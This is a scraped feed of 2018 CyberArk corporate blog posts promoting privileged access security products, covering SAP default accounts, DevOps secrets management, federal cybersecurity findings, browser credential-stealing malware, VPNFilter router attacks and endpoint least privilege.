Learn how CyberArk can help secure privileged access, create credential boundaries and provide enhanced auditing and recording within the ESAE and production environments by downloading this solution brief.

 

]]>
Protecting Critical Business Systems: Five SAP Use Cases Protected by CyberArk https://www.cyberark.com/blog/protecting-critical-business-systems-five-sap-use-cases-protected-cyberark/ Fri, 29 Jun 2018 19:00:57 +0000 https://www.cyberark.com/?p=25739/

In November, we wrote a blog about the “7 types of privileged accounts you should know” to highlight potential privilege-related security risks. Today, we are spotlighting  five powerful user accounts frequently found in SAP environments. These accounts are all created during the installation process when using SAP NetWeaver Application Server for ABAP and/or Java.  The accounts can be centrally secured and managed by the CyberArk Privileged Access Security Solution.

  1. SAP*: Also known as SAP system super users, these accounts have sweeping access across SAP systems and are created in all clients immediately upon installation. These accounts need to be manually deactivated in all clients and added to a “SUPER” group, so that only authorized administrators can make changes. CyberArk helps to vault related credentials in an encrypted repository, making sure that even those authorized to make changes to this super group are indeed the only ones able to do so. If these credentials aren’t locked down, malicious actors can potentially achieve unlimited access to the data stored in the system.
  1. DDIC (Data Dictionary): DDIC users have special authorizations for installation, software logistics and the ABAP dictionary. The SAP installer assigns the default password for DDIC users that is designated as the master password during installation. In order to make sure that things run smoothly, DDIC requires authorizations for SAP_ALL during an installation or upgrade and is then locked afterwards. To account for human error, the CyberArk Privileged Access Security Solution allows for automatic rotation of vaulted accounts and can change passwords immediately upon use, removing the required manual authorization process.
  1. EarlyWatch: EarlyWatch is an automatic service that monitors essential administrative areas of an SAP system and is most effective when activated for all SAP components in the stack. Because of the sweeping access that these accounts require, it is crucial to detect, analyze, and when necessary, remediate attempts to access these accounts, something that CyberArk Privileged Threat Analytics can help with. These accounts also need to be provisioned in the SUPER group, so that only authorized users can change the passwords. With a central repository to manage and secure privileged credentials, SAP admins can dramatically reduce risks of privileged credential compromise.
  1. SAPCPIC (Common Programming Interface for Communications): CPIC accounts are used for remote connections to legacy SAP systems (4.5 and older). These accounts are mostly leveraged in Electronic Data Interchanges and have access to the S_A.CPIC profile. Malicious users can remotely execute Request for Comments or create dialog users with any privileges to enter the system and obtain unlimited amounts of information. These accounts can be deleted if unneeded, but additional actions need to be taken if the account is also necessary to change the default password. In this case, access is only granted if required — and related policies can be easily configured out of box with the CyberArk Privileged Access Security solution.
  1. TMSADM: During installation, a master password is set for TMSADM users for Transport Management Systems. This password is automatically set as a default, and it needs to be manually changed. SAP’s recommended best practice is to change the default password for TMASDM users, but this again requires levels of manual attention that can be forgotten or bypassed. The CyberArk Privileged Access Security Solution can also be leveraged to vault these accounts, automatically create complex passwords and rotate them based on policy.

Only CyberArk enables this level of comprehensive discovery, onboarding and management of privileged SAP accounts and credentials. For example, it’s a best practice to require the powerful users in SAP environments to verify their identities in order to access these accounts, and CyberArk can be used to validate and rotate credentials to ensure appropriate access. SAP has a set of security best practices specific to their applications and systems that organizations utilize, and with this certified integration, enterprises can be confident that this critical layer of security – privileged access security — is extended throughout the network.

Find additional information on the SAP Certified Apps Directory and the CyberArk Marketplace (search ‘SAP’ in the search field for all available integrations).

]]>
Brace for IMPACT with CyberArk Privileged Access Security Solution v10.4 https://www.cyberark.com/blog/brace-impact-cyberark-privileged-access-security-solution-v10-4/ Thu, 28 Jun 2018 20:45:36 +0000 https://www.cyberark.com/?p=25719/

CyberArk’s annual global Impact events are right around the corner. It’s THE place where attendees can connect with privileged access security experts to learn about industry trends, best practices and technology advances. We’ll be in Berlin next week and Boston mid-July.

In time for Impact 2018, we are excited to announce the availability of the CyberArk Privileged Access Security Solution v10.4. By dramatically simplifying and automating installation, enhancing how privileged risk is assessed and managed, and securing privileged access from endpoints to the cloud, organizations can quickly reduce cyber security risk across on-premises, cloud and hybrid environments.

Only CyberArk delivers the powerful combination of technical innovation, a great user experience and flexibility to scale across enterprise environments to mitigate the threat of compromised privileged credentials. New features and enhancements to the CyberArk Privileged Access Security Solution v10.4 give organizations the ability to:

  • Speed and simplify deployment on-premises and in the cloud: Customers now have the ability to deploy and configure our solution faster and easier than ever. The new CyberArk Privileged Access Security Installer delivers a 96 percent reduction in the steps required to deploy a typical on-premises customer implementation. The new Installer ensures that all pre-requisites are met, and it hardens any components as needed. For customers with hybrid environments, CyberArk’s flexible and modular architecture enables rapid deployment within approximately 10 minutes of the CyberArk Privileged Access Security Solution on Microsoft Azure utilizing Azure Resource Manager templates.
  • Advance risk-based privileged account on-boarding and session monitoring: With enhanced Privileged Threat Analytics capabilities, CyberArk delivers the most comprehensive solution for mitigating privilege-related risk with a combination of risk-based session suspension and account on-boarding. New functionality for security operations teams enables the review of risky sessions in real time, based on policy, preventing attacks involving the misuse of privileged credentials. New automated account creation enables security teams to directly on-board and preconfigure pending accounts and thwart the use of privileged backdoor accounts.
  • Reduce risk of lateral movement: CyberArk Endpoint Privilege Manager reduces the risk of lateral movement from Mac workstations with enhanced privilege management capabilities, allowing users to install applications and execute sudo commands, based on policy, without requiring admin level credentials. It also enables organizations to enforce least privilege across the enterprise, including the ability to rotate local admin credentials for Windows and Mac workstations both on and off corporate networks.

If you’d like to upgrade to the latest version of the CyberArk Privileged Access Security Solution, please reach out to your Account Management team or request a demo here!

Additional Resources

]]>
CyberArk Conjur Added as a Key Security Element of the “Periodic Table of DevOps Tools” https://www.cyberark.com/blog/cyberark-conjur-added-key-security-element-periodic-table-devops-tools/ Wed, 27 Jun 2018 14:03:28 +0000 https://www.cyberark.com/?p=25702/

DevOps tools are being released at record pace, and keeping up with the latest – and most effective – can be challenging. The “Periodic Table of DevOps Tools” is an excellent go-to reference to help IT professionals navigate the expanding market. XebiaLabs this week published an updated version of the resource – and spotlights CyberArk Conjur (element CK, number 118) as an integral security tool.

Available as an open source tool and for the enterprise, CyberArk Conjur is a secrets management solution tailored specifically for the evolving infrastructure requirements of native cloud and DevOps environments. The solution incorporates fundamental DevOps security principles, such as least privilege and segregation of duties, to secure and manage secrets used by non-human machine identities—from CI/CD tools to containers to applications to microservices—as well as human users throughout the DevOps pipeline.

CyberArk Conjur integrates with leading DevOps tools including Ansible, Jenkins, Docker, Chef and Puppet, enabling these tools to access and use secrets and credentials managed by CyberArk Conjur. In addition, CyberArk Conjur integrates with the leading platform-as-a-service (PaaS) solutions, including Red Hat OpenShift, Kubernetes (K8S), Pivotal Cloud Foundry (PCF) and Cloud Foundry (CF).

Note:  Some integrations are currently only available for CyberArk Conjur Enterprise, see here for details.

With CyberArk Conjur, secrets and credentials can be consistently managed across DevOps environments regardless of the secrets management capabilities of the native DevOps tools or platforms, which can vary significantly and are not always enterprise ready. For example, some native tools are missing critical credential rotation and audit capabilities. Importantly, this solution eliminates “islands of security” created when individual DevOps tools cannot securely share secrets with each other.

Try the Hosted Tutorial for CyberArk Conjur Open Source

It’s easy to get started. Check out the CyberArk Conjur Open Source-hosted tutorial for a tour of core secrets management concepts such as storing and fetching secrets, machine authentication and authorization and security policy as code. This is a hosted version of the Conjur Open Source, so as you get started, you’ll be asked to answer a few basic questions before you get your API key.  If you need help or would like to chat with your peers, join our Slack community.

 

 

]]>
Weak Security Checks and Balances Compound Privileged Access Risks https://www.cyberark.com/blog/weak-security-checks-balances-compound-privileged-access-risks/ Fri, 22 Jun 2018 15:11:52 +0000 https://www.cyberark.com/?p=25667/

The U.S. Department of Interior recently released a report concluding that two dams critical to national security operate with an elevated risk of insider attacks – too many employees have access to admin accounts and industry best practices are not followed.

The dams are among five operated by the U.S. Bureau of Reclamation. The report finds that account access isn’t always revoked when employees leave, and the agency isn’t conducting robust enough background checks for employees with high-level privileges. The full report can be found here.

Even though cyber security best practices are well documented and critical infrastructure is a known target, we continue to learn about security gaps that should be addressed with high priority. It’s a fact that employees need a certain amount of privileged access to do their job successfully. Best practices account for this – giving an appropriate level of access for employees while following a “trust but verify” approach. If proper controls are not in place and followed, organizations are exposed to risks with known and unknown consequences.

Would an employee compromise a system from within, disrupt operations and potentially conceal malicious activity? Yes, we see the headlines regularly, and this isn’t a new problem.  For example, in 1999, a former employee with a pirated copy of control system software and a two-way radio transmitter wreaked havoc on a sewage system in Australia, stopping pumps and alarms and allowing thousands of gallons of sewage to flood the landscape. (The “Maroochy Incident” is discussed in an episode of the “Malicious Life” podcast:  http://malicious.life/episode/episode-7-stuxnet-part-1/ ).

When it comes to government agencies and exploiting privileged access, names such as Edward Snowden, Chelsea Manning and Joshua Schulte readily come to mind.

Trying to stop insider attacks from a human-centric approach is impossible, simply because humans are unpredictable. What is predictable, though, is that attackers need to exploit privileged access to reach sensitive information and exfiltrate it. For this reason again, security controls must be in place.

While some may argue that operational concerns override security, it is possible to achieve an effective operational and security balance. Locking down privileged access is an effective way to break the attack chain, and CyberArk has the framework and the tools to jump start and improve security for organizations both in the private and public sectors. Even more specifically, CyberArk solutions provide steps to safeguard critical infrastructure.

Some items to consider when balancing operational and security concerns:

  1. Identify and prioritize privileged access within the environment.

In order to identify which accounts need to be protected and which need to be restricted, it is important to assess the environment’s status. CyberArk’s Discovery and Audit (DNA) tool can help organizations locate privileged accounts and discover whether the accounts are currently active. Once organizations know the full status of their privileged accounts, it is easier to create a security plan to monitor and control access.

  1. Tackle the highest risk access first.

Once privileged access has been identified, the organization can plan for a privileged access security hygiene program. CyberArk has tools to promote and provide for protecting privileged access in a variety of ways, including vaulting credentials (Enterprise Password Vault), isolating sessions that use those vaulted credentials (Privileged Session Manager), and continuously monitoring usage of those privileged accounts and responding when necessary (Privileged Threat Analytics).

  1. Enforce principles of credential boundaries.

Separate assets into tiers according to criticality of systems and then allow access to accounts that can authenticate into those assets. For example, Tier 0 are absolutely mission-critical assets; Tier 1 are any servers that do not fall into Tier 0; and Tier 2 include endpoints. Each tiered asset should only have accounts that are accessible within its tier. The idea is that if an attacker compromises a workstation that is in Tier 2, they cannot move laterally to Tier 0 and 1 assets.

  1. Promote cyber hygiene best practices.

It’s one thing to have the proper tools – it’s another thing entirely to utilize those tools strategically to the organization’s best advantage. Password vaulting and management, isolation of privileged account access and limiting the number of users with administrative privileges all combine to reduce the organization’s attack surface.

Removing passwords from the hands of admins, so that they don’t have to remember passwords, write them down or save them in easily accessed documents, makes their lives easier – an operational win. Vaulting those passwords and securing credentials where they are not easily breached or stolen is a win for security. Organizations do not have to choose between the two, as long as they use the right tools in the right setting.

Read our whitepaper to learn more about the CyberArk Privileged Access Security Cyber Hygiene program, and visit www.cyberark.com to learn more about how CyberArk solutions can assist in securing Industrial Control Systems

]]>
Federal Cybersecurity Report Finds Majority of Agencies at Risk https://www.cyberark.com/blog/federal-cybersecurity-report-finds-majority-agencies-risk/ Wed, 20 Jun 2018 15:41:26 +0000 https://www.cyberark.com/?p=25627/

As a number of crippling breaches have illustrated, federal government agencies and departments are frequent targets in today’s advanced attacks. The White House’s Office of Management and Budget (OMB), in partnership with the Department of Homeland Security (DHS), recently conducted a cyber risk assessment of 96 agencies across 76 metrics to measure their cyber security postures. The resulting report, “Federal Cybersecurity Risk Determination Report and Action Plan,” paints a bleak picture, indicating that 74 percent of agencies are either “At Risk” or “High Risk.” This underscores the urgent need for change.

The report identifies four key areas where agencies struggle:

  1. Agencies neither understand nor have the resources to combat the current threat environment. The report finds that despite high-profile and crippling attacks, such as the U.S. Office of Personnel Management (OPM) breach, the “ability to determine threat actors’ motivations and methods for staging cyber attacks has not improved.” In fact, the report reveals that visibility or “situational awareness” is so limited that agencies could not identify the method of attack, or attack vector, in 38 percent of cyber incidents that led to information or system compromise in 2016.
  2. Lack of standardized cyber security processes and IT capabilities, impacts the ability to efficiently gain visibility and combat threats. When it comes to managing privileged access to critical information and systems, the report indicates that only 55 percent of agencies limit access based on user attributes and roles—and only 57 percent review and track administrative privileges at all. This is particularly troubling, since privileged accounts provide access to these organizations’ most critical cyber infrastructure and sensitive information.
  3. Lack of visibility into what is happening on the network and the inability to detect data exfiltration. Only 27 percent of agencies reported having the ability to detect and investigate attempts to access large volumes of data—and even fewer test these capabilities annually. In other words, just one in four agencies can identify data exfiltration attempts at all. Further, the assessment found that only 30 percent of agencies have predictable, enterprise-wide incident response processes in place.
  4. No standardized or enterprise-wide processes for managing cyber security risks. The report notes, “Agencies possess neither robust risk management programs nor consistent methods for notifying leadership of cyber security risks.” It also indicates that less than 16 percent of agencies achieved the government-wide target for encrypting data at rest, despite “repeated calls from industry leaders, GAO and privacy advocates to make more robust use of data-level protections, including the encryption of data both at rest.”

Along with greater accountability, increased awareness and consolidation/ standardization of security resources to enhance efficiencies, the report’s recommendations include implementation of existing government guidelines and frameworks, such as FISMA/NIST SP800-53, NERC – CIP, HSPD-12 and the Department of Homeland Security CDM Program. Due to the powerful, unfettered access privileged accounts provide, privileged account protection and threat detection are at the center of many of these requirements.

Though this report includes sobering statistics, significant progress is possible. Agencies must first clearly understand their cyber security responsibilities tied to these existing frameworks. From there, they should thoroughly assess their current cyber security tools and processes, looking for ways to optimize them to address these requirements.

But they don’t have to go it alone. CyberArk is the recognized leader in protecting privileged access, and we have multiple Department of Defense customers and installations of the CyberArk Privileged Access Security Solution across the U.S. Federal Government in on-premises, cloud and ICS environments, and throughout the DevOps pipeline.

Many large-scale deployments in distributed and virtual environments are based on the CyberArk Privileged Access Security Hygiene Program, a proven, systematic approach that helps agencies to address their top privileged access control goals—from eliminating irreversible network takeover attacks to securing SaaS admins and privileged business users.

To learn more about our work in protecting federal agencies from advanced threats and supporting compliance while establishing and maintaining strong privileged access security hygiene, please explore our federal industry resources for more detail.

]]>
Privileged Account Management is #1 Security Project in 2018 for CISOs, Says Gartner* https://www.cyberark.com/blog/privileged-account-management-1-security-project-2018-cisos-says-gartner/ Mon, 18 Jun 2018 19:13:00 +0000 https://www.cyberark.com/?p=25584/

Recently, we attended the 2018 Gartner Security & Risk Management Summit. The event is always a valuable opportunity to learn from top CISOs and security and risk management professionals, to explore leading-edge research and to discuss emerging cyber security trends.

Although there were a number of excellent presentations throughout the week, one in particular stood out based on its pragmatic guidance and actionable takeaways. Also, organizations have long term strategic security programs, but they need to demonstrate quick wins along the way.

In his talk, “Top 10 Security Projects for Security and Risk Management Organizations,” Gartner VP and Distinguished Analyst Neil MacDonald outlined the top 10 security projects for 2018, based upon a number of criteria: the emerging technologies that support the project are not yet mainstream; the project helps deliver against the CARTA (continuous adaptive risk and trust assessment) approach; and the project has high risk reduction versus resources required as compared to alternatives.**  MacDonald identified privileged account management (PAM) as the #1 focus for organizations.

In our opinion, strategic privileged account management projects should be expanded into a longer term program. Comprehensive privileged account management that extends protections to other users and applications across the enterprise, in the cloud, at the endpoint and throughout the DevOps pipeline, will take an integral project to the next level.

Ready to get started?  Start by prioritizing the implementation of controls for protecting privileged credentials to drive tangible results quickly. A CyberArk report, “Rapid Risk Reduction: A 30-Day Sprint to Protect Privileged Credentials,” outlines a proven framework for an intensive sprint of approximately 30 days to help reduce risk and achieve quick wins.

Don’t stop there. After demonstrating the value of protecting privilege across high-risk areas to key stakeholders, it’s time to take a phased approach to expand coverage to new areas, evolving these projects into long-term, business-critical cyber security programs.  For guidance, we encourage you to download the CyberArk  Privileged Access Security Hygiene whitepaper.

*Gartner, Smarter with Gartner, Gartner Top 10 Security Projects for 2018, June 6, 2018

**Gartner, Gartner Security & Risk Management Summit 2018 agenda, https://www.gartner.com/en/conferences/na/security-risk-management/agenda/track

]]>
Is It Time for a Cyber Hygiene Check Up? https://www.cyberark.com/blog/time-cyber-hygiene-check/ Thu, 14 Jun 2018 15:49:09 +0000 https://www.cyberark.com/?p=25563/

The National Institute of Standards and Technology (NIST) recently released version 1.1 of its CyberSecurity Framework, which incorporates feedback received from public comments and workshops over the past two years. Though the document is chiefly designed to help improve cyber security risk management in critical infrastructure, the Framework’s principles and best practices can be followed by organizations across industries in order to improve their security posture.

Many of the CyberSecurity Framework’s refinements center around cyber hygiene—or actionable steps that organizations can take to “clean up” current weaknesses and potential vulnerabilities. These steps are particularly important in the wake of massive attacks such as WannaCry. In fact, post-attack studies show that WannaCry’s impact could have largely been prevented if basic security best practices had been applied.

As the CyberSecurity Framework underscores, one of the most effective, preventative steps an organization can take to bolster its security program is to secure privileged accounts, credentials and secrets. Attackers continually look for new ways to exploit an organization’s vulnerabilities, so a “set it and forget it” approach is sure to fail, especially when it comes to privileged access since an company’s sensitive applications and systems can change as a company grows or changes direction. For example, if your organization secured privileged access for Windows built-in accounts on systems with access to sensitive data, then be sure not to stop there but commence work on the next set of systems that deliver the most risk reduction, given time and effort required.

Since the enterprise infrastructure is ever-changing, it’s important to look for new infrastructure in the cloud and new SaaS applications that could have access to sensitive business data. To have the strongest defense against attackers, organizations need to ensure their privileged access security program is up to date and continues to protect their most critical infrastructure, applications, customer data, intellectual property and other vital assets.

The CyberArk Privileged Access Security Cyber Hygiene Program

To help organizations establish and maintain strong a privileged access security program, CyberArk developed customized, step-by-step goals and an actionable process for achieving the highest level of protection against common attacks on privileged accounts, credentials and secrets. The program addresses these types of attacks:

  • Irreversible network takeover attacks: Attackers establish persistence in an organization by performing an attack that is not only hard to identify but also so intrusive that the business must rebuild to remove the attacker—e.g., a Kerberos attack, such as a Golden Ticket.
  • Infrastructure account attacks: Attackers leverage powerful default infrastructure accounts that exist on-premises or in cloud environments and are seldom used in day-to-day operations, but can provide the attacker with excellent opportunities for access to highly sensitive data.
  • Attacks that leverage lateral movement: Attackers often steal credentials by gaining a foothold on endpoints and then moving laterally, for example by using Pass-the-Hash techniques, in order to steal elevated permissions.
  • Targeting credentials used by third-party applications: Attackers compromise third-party applications that are used to perform operations such as deep scans in order to steal their embedded privileged credentials. From here, they execute attack goals while completely circumventing the targeted company’s defenses.
  • Targeting *NIX SSH keys: Attackers leverage unmanaged SSH keys in order to login with root access and takeover the *NIX technology stack. Unix/Linux systems house some of an enterprise’s most sensitive assets and Linux systems are increasingly deployed in the cloud. Individual accounts and credentials—including SSH keys—used to gain root privileges are often overlooked by security teams.
  • Targeting DevOps secrets in the cloud and on-premises: Attackers can compromise secrets embedded in code and Continuous Integration/Continuous Deployment (CI/CD) tools, in order to exploit the environment for more pervasive access.
  • Targeting SaaS admins and privileged business users: Attackers steal credentials used by SaaS administrators and privileged business users, in order to get high level and stealthy access to sensitive systems.

The CyberArk Privileged Access Security Cyber Hygiene Program leverages the extensive experience the CyberArk Security Services team has gained from responding to significant data breaches, including those at many large organizations. Often these breaches have resulted from some of the most common attacks involving privileged access, and each example provides valuable insights into how attackers operate and exploit an organization’s vulnerabilities. Implementing this type of program effectively should help organizations achieve greater risk reduction in less time, and help satisfy security and regulatory objectives with fewer internal resources.

Read our whitepaper to learn more about the CyberArk Privileged Access Security Cyber Hygiene Program and visit here to learn more about how to ramp up your privileged access security program with CyberArk Security Services.

]]>
Maximize Your Investments in Identity Governance and Privileged Access Security with CyberArk and SailPoint https://www.cyberark.com/blog/maximize-investments-identity-governance-privileged-access-security-cyberark-sailpoint/ Mon, 11 Jun 2018 14:00:53 +0000 https://www.cyberark.com/?p=25396/

Privileged access security is too often implemented independently from an identity governance solution, which can create siloes, inefficiencies and prevent full visibility across an identity’s user access lifecycle. To enhance the reliability and flexibility of an organization’s security stack, privileged access security data should be integrated into effective identity governance and access management strategies.

The CyberArk Privileged Access Security Solution integration with SailPoint IdentityIQ enables customers to strengthen their security posture by automatically and consistently applying governance policies to all identities—including privileged identities (individuals and applications) and access entitlements. By not having to toggle back and forth from one solution to the other, organizations can gain comprehensive visibility into all accounts and govern them from a centralized location. This synchronization also enables security teams to easily consolidate certifications for privileged and non-privileged accounts and grant access more rapidly to maximize productivity, while reducing operational time and cost.

Join CyberArk and SailPoint in an “On the Front Lines Insider” webinar on June 26th at either 9:00 a.m. or 2:00 p.m. ET to discover ways to maximize your investments in identity governance and privileged access security. Register here to save a spot for this technical presentation.

You can also learn more about the power of integrated identity governance and privileged access security in this Sailpoint blog post and explore details on the CyberArk Privileged Access Security Solution integration with SailPoint IdentityIQ on the CyberArk Marketplace.

 

]]>
Think Twice Before You Click to Save Credentials in a Web Browser https://www.cyberark.com/blog/think-twice-click-save-credentials-web-browser/ Fri, 01 Jun 2018 13:32:33 +0000 https://www.cyberark.com/?p=25195/

It’s increasingly common: attackers target credentials stored within web browsers. Such attacks could happen on any of the well-known browsers that dominate the market today including Chrome, Firefox and Internet Explorer. The motivation and method behind the attacks vary, but the message is clear – browsers are a soft target on today’s hacker’s short list.

Why is this so?

Every browser offers a means to save credentials for online/web accessible systems. In fact, the option is frequently displayed as a pop-up box that highlights “save” as the default.

This simple, time-saving step encourages adoption of the feature. Users, after all, like the convenience of not having to enter credentials every time they visit their favorite website or frequently used system. The information stored in the browser is publicly available to programs that the user runs. But despite the convenience, there is a major downside: credentials saved in a browser are a natural target for phishing attacks and provide easy access to the targeted user’s systems.

As seen in the Vegas Stealer malware, there can be a hefty price to pay when users opt to press that “save credential” checkbox. Victims of this type of attack can unintentionally expose sensitive, browser-accessible IP. The malware is in use across multiple industries and particularly prevalent in marketing, advertising, public relations, retail and manufacturing. This is likely because these targets tend to have higher-than-average usage of 3rd party and SaaS solutions in operation.

Another credential stealing malware is the one targeting crypto-chat app Telegram. Once downloaded, the malware extracts browser credential data that allows restoring cache and maps files into an existing Telegram desktop installation. If the session was open, the attacker has the chance to access the victim’s session, contacts and previous chats without their knowledge.

Want to learn how to mitigate this risk without impacting your end-user systems?

Join us for a CyberArk On the Front Lines webcast titled “Protecting the Privileged Pathway: Learn how from demos of five attack scenarios that exploit privilege,” on June 5, 2018. There are two sessions that you can join: 9 a.m. and 2 p.m. ET.

During these sessions, our endpoint privileged access security experts will explain the finer points of how attackers use targeted phishing attacks to steal credentials with Mimikatz. They will also demonstrate several escalations, including browser credential harvesting. Attendees will gain best practices for mitigating risk using CyberArk Endpoint Privilege Manager. For those interested in learning how current, real-world attacks take place, along with ways to prevent them, this webcast is for you.

To learn more about how to mitigate attacks on endpoints across your enterprise, download our CyberArk Endpoint Privilege Manager datasheet.

Register today, and we’ll see you On the Front Lines!

]]>
VPNFilter Malware Shines Light on Router Risks and Possibilities https://www.cyberark.com/blog/vpnfilter-malware-shines-light-router-risks-possibilities/ Thu, 31 May 2018 14:41:05 +0000 https://www.cyberark.com/?p=25130/

Recently discovered VPNFilter malware has infected an estimated 500,000 routers in 54 countries. The FBI is urging consumers to reboot routers, but enterprises also need to take note. Unsecured routers introduce significant risk. Routers oftentimes don’t have the same security controls as servers or other devices. However, a router with network access could allow a threat actor to infect other network-connected assets.

Even in cases where routers are segregated by a demilitarized zone (DMZ), it is possible for business users on the web to unwittingly pull malicious payload inside the network – letting a threat actor in.

VPNFilter and other malware types provide threat actors with persistent functionalities, including network sniffing, remote code execution and router firmware modifications. These functionalities are noteworthy because they support three possible attack scenarios:

  • Reflective DDoS attack – In this scenario, the infected routers become an enormous botnet awaiting the command to charge a specific website or web service with high traffic volume, rendering them unavailable. The Mirai malware that infected about 500,00 IoT devices two years ago demonstrates the order of magnitude such attacks could reach in two different attacks– krebsonsecurity.com (620Gbps) and on the DNS provider Dyn (an attack that was said to reach 1Tbps).
  • Tunneled attack – In this scenario, the infected routers are used as hubs for attacks on other third parties. The infected routers tunnel the attack to the targeted party while concealing the original source of the attack. Tunneling the attack through compromised devices is a common practice used by threat actors to cover their tracks. As many of the VPNFilter-infected routers are located in Ukraine, it is believed that the routers will be used as proxies as part of the ongoing offensive campaign targeting Ukraine as the malware shares code with BlackEnergy.
  • Network foothold – In this last scenario, the routers will be used as a penetration point to the router internal network. Controlling the router in a network provides wide access to network traffic passing through, and it provides threat actors with the opportunity to control and redirect the traffic. This opens up the attack surface of the network, as the threat actors will be able to inject code or redirect the traffic to malicious sites.

Because the VPNFilter malware targeted home and small business routers, including NetGear, Linksys, MikroTik and TP-Link, the DDoS attack and tunneled attack scenarios are most probable.

The VPNFilter malware exploits known vulnerabilities of the different routers and then pulls stage two and three payloads, adding more functionalities to the malware. Hence to mitigate the risk introduced by VPNFilter and other similar malware variants, it is enough to update the router firmware. Remediation on the other hand, requires a “factory reset” of the router to remove the persistent malware parts.

Large organizations, which haven’t yet been targeted by VPNFilter, should take into account the fact that the perimeter might not be only breached, providing initial narrow access to a threat actor; the perimeter might already be owned by the threat actors, providing a wide attack surface.

In such a scenario, privileged access security is the last – and arguably most important line of defense – preventing the threat actors from taking control of the network.

]]>
Six Core Principles for Establishing DevOps Security at Scale https://www.cyberark.com/blog/six-core-principles-establishing-devops-security-scale/ Mon, 28 May 2018 13:15:06 +0000 https://www.cyberark.com/?p=24929/

The development and operations teams at organizations worldwide have adopted DevOps methodologies to deliver applications quickly and cost-effectively. With this surge of adoption comes the need for greater awareness of the associated risks. For example, consider highly publicized security breaches linked to DevOps processes in recent months.

DevOps and security leaders increasingly recognize that DevOps requires a fresh approach to security – one that mitigates risk and uncertainty without impeding velocity. By following six guiding principles, organizations can more effectively accelerate the pace of innovation while enabling DevOps security at scale:

  1. Instantiate Security Policy as Code. “Infrastructure as Code” is a cornerstone of DevOps. When applied to security—by instantiating and managing security policy as code—organizations can better control access to critical systems by eliminating time-intensive, error-prone processes for configuring permissions and managing passwords.
  2. Instill Separation of Duties. By clearly defining distinct roles and responsibilities within a DevOps team, businesses can optimize operations, minimize risks and accelerate the pace of development.
  3. Focus on Flow and Velocity. Advanced workflow scheduling and management tools allow teams to visualize workflows, identify bottlenecks and eliminate inefficiencies. By incorporating security into these analyses, DevOps teams can detect and address security issues early on.
  4. Treat Security as a First-Class Citizen. By instituting strong security systems and following good security hygiene practices throughout the application lifecycle, development teams can reduce vulnerabilities, improve their security posture and mitigate risks
  5. Automate DevOps Security. Effective DevOps teams use automation to accelerate application lifecycle management and remove latency. They should take a similar approach to security, leveraging automation to improve their security posture while avoiding barriers to application development and delivery.
  6. Embrace New Technologies. Traditional approaches for security (designed to protect legacy IT environments) often aren’t well suited for today’s dynamic environments. Forward-looking security teams embrace new security technologies and models while leveraging the policies and lessons learned from more traditional environments.

To learn more about delivering security that works at DevOps velocity, download CyberArk’s eBook, 6 Core Principles for Establishing DevOps Security at Scale.

For more information about CyberArk’s powerful secrets management solution, specifically designed to help developers easily and conveniently meet the security requirements of agile and scalable DevOps environments, read about CyberArk Conjur Enterprise. You can also try Conjur Open Source. 

]]>
GDPR Is Here: Resources for Your Compliance Journey https://www.cyberark.com/blog/gdpr-resources-compliance-journey/ Fri, 25 May 2018 12:35:39 +0000 https://www.cyberark.com/?p=24923/

Today is the day. After all the build-up, the GDPR deadline is officially here. From the inevitable next breach, we will more fully understand how well organizations prepared and the implications of this far-reaching regulation.

The regulation is designed to better address the protection of personal data, so much of the buzz around GDPR has been focused on end-users. Of course, GDPR goes much deeper than that. At the heart of GDPR compliance is a mandate to manage who has access to personal data and how that access is protected. CyberArk’s David Higgins shares an example in this week’s CRN piece, 10 Security Experts On What the Industry Doesn’t Get About GDPR, noting, “The hidden layer of any organization are the IT administrators since they have access to the data needed to the keep the lights on and the systems running. For this reason, attackers looking to steal data often target IT administrators rather than human resources or finance leaders since the former usually have access to more valuable data.”

A strong privileged access security strategy, which provides end-to-end protection of privileged accounts, credentials and secrets that have access to the systems and applications containing personal data, is critical to ensure your organization’s IT administrators do not find themselves in the cross-hairs of regulators. A sound strategy will also help you to avoid the financial penalties and liabilities associated with GDPR.

Over the past year, we’ve worked closely with our customers and partners to help prepare for the GDPR. As you continue on your compliance journey, tap our comprehensive library of free GDPR resources available to help you mitigate risk, avoid potential fines and liability and, most important, implement a stronger enterprise security posture moving forward.

 

]]>
Where Are You Placing Your Endpoint Security Bets? https://www.cyberark.com/blog/placing-endpoint-security-bets/ Tue, 22 May 2018 13:04:30 +0000 https://www.cyberark.com/?p=24851/

Defense-in-depth is a common security strategy that often includes a combination of endpoint security products, including next generation anti-virus (NGAV), traditional anti-virus (AV) and/or endpoint detection and response (EDR). But as attacks and breaches continue to surge, I can’t help but wonder: are these technologies missing the point?  The CyberArk Endpoint Privilege Manager and products in NGAV (including traditional AV) and EDR primarily share the same end goal of preventing attackers from stealing your IP, ruining your brand and/or taking off with your sensitive customer data. But, each one takes a fundamentally different approach. We have discussed some of the limitations on these technologies previously, but as a refresher, NGAV and EDR primarily look to identify threats, each threat, with their proprietary technology whereas EPM primarily looks to control which applications can run, and how they run, with privilege as well as protect against credential theft.

What some endpoint products miss is that if you’re running as an admin, it’s only a matter of time before the bad guys “get in and own you.” This even appears in some of their corporate messaging. No single endpoint product can claim a perfect record for effectively stopping an attacker from getting in. Furthermore, given that most attacks are initiated via a phishing attack vector, such as an email that tries to lure the victim into opening a document, executing content, or visiting a fake website, you have to assume breach is inevitable given enough time and effort on the attacker’s part.

Just like in Vegas, it’s a numbers game, and the house always wins in the end (oh, and you’re not the house). Hackers know this and expect that even in the most secure environments, even with members of the IT admin teams that should know better, mistakes do happen, clicks eventually happen, and unfortunately pwns happen. If you are like one of the many companies recently surveyed that reported that most users (86 percent) still operate with admin/elevated privileges, you are on the wrong side of that bet. As a result, the attackers will have a privilege pathway paved for them.

Privileged access is what enables attackers to achieve their goals. For this reason and others, companies should be using an endpoint security solution that also efficiently and effectively implements least privilege. Think about it: If your end users are not running as admin, then even when an attacker evades an NGAV product or circumvents detection by an EDR product, the attacker is exceedingly unlikely to move from the point of origin. Instead, they will be contained on the endpoint. It’s really that simple, but getting there is not always so simple (otherwise everyone would be doing it).

While it is relatively easy to remove local admin rights for users (just Google “group policy to remove local admin rights” to see a few examples), doing so can make your end users very unhappy because now they won’t be able to install most applications, update drivers, etc., which will in turn result in more help desk calls. This has the opposite effect over time when local admin rights are then re-granted back to more and more end users. This puts you right back to where you were. (Read this post on the importance of removing local admin rights from endpoints and how to effectively balance security and productivity in the process).

